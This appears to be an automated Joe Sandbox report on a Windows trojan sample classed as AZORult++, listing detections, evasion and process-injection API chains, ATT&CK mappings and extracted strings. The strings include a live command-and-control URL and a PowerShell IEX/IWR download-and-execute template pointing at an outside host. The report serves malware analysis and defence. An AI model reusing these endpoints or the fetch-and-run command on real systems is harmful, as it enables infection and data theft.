Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Analysis ID:1426755
MD5:69b4504419872fee9bc3bc996b88eb4b
SHA1:f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256:0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
Tags:exe
Infos:

Detection

AZORult++
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeAvira: detected
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeVirustotal: Detection: 80%Perma Link
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8306 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_005A8306
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8330 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_005A8330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8F20 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005A8F20
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB8ACD FindFirstFileExW,0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A6690 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005A6690
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeString found in binary or memory: http://195.123.217.199/aahs.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.123.217.199/aahs.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeString found in binary or memory: https://xpradiotwo.com/wp-content/uploads
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://xpradiotwo.com/wp-content/uploads/c

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8DC0 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_005A8DC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A5E60 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_005A5AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FBE87D0_2_00FBE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A78500_2_005A7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A74300_2_005A7430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A24900_2_005A2490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A42500_2_005A4250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A46500_2_005A4650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: String function: 00FB4480 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: String function: 00FB3040 appears 46 times
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.bank.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A6200 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_005A6200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A6AC0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_005A6AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCommand line argument: jhl46745fghb0_2_00FB2F40
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeVirustotal: Detection: 80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeSection loaded: sspicli.dllJump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00FB1300

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-11872
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-11968
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeAPI coverage: 9.6 %
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB8ACD FindFirstFileExW,0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005A8610
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeBinary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeBinary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.199/aahs.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://xpradiotwo.com/wp-content/uploads/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeAPI call chain: ExitProcess graph end nodegraph_0-11972
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeAPI call chain: ExitProcess graph end nodegraph_0-10632
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00FB1300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB1710 mov ecx, dword ptr fs:[00000030h]0_2_00FB1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB75A2 mov eax, dword ptr fs:[00000030h]0_2_00FB75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB9763 mov eax, dword ptr fs:[00000030h]0_2_00FB9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A7640 mov eax, dword ptr fs:[00000030h]0_2_005A7640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A5E60 mov eax, dword ptr fs:[00000030h]0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FBA845 GetProcessHeap,0_2_00FBA845
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FB3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FB421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB43AF SetUnhandledExceptionFilter,0_2_00FB43AF

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_005A5AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB44C5 cpuid 0_2_00FB44C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_00FB4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB4103
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exeCode function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_005A8610
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Access Token Manipulation
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
Native API
Boot or Logon Initialization Scripts1
Process Injection
1
Access Token Manipulation
LSASS Memory231
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Account Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
System Owner/User Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync112
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe83%ReversingLabsWin32.Trojan.Azorult
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe81%VirustotalBrowse
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe100%AviraTR/Kryptik.kpmcp
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://195.123.217.199/aahs.php0%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://195.123.217.199/aahs.phpSecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exefalseunknown
http://195.123.217.199/aahs.php%temp%SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmpfalse
    unknown
    No contacted IP infos
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1426755
    Start date and time:2024-04-16 15:27:20 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 2m 10s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:2
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
    Detection:MAL
    Classification:mal88.bank.evad.winEXE@1/0@0/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 5
    • Number of non-executed functions: 68
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe
    No simulations
    No context
    No context
    No context
    No context
    No context
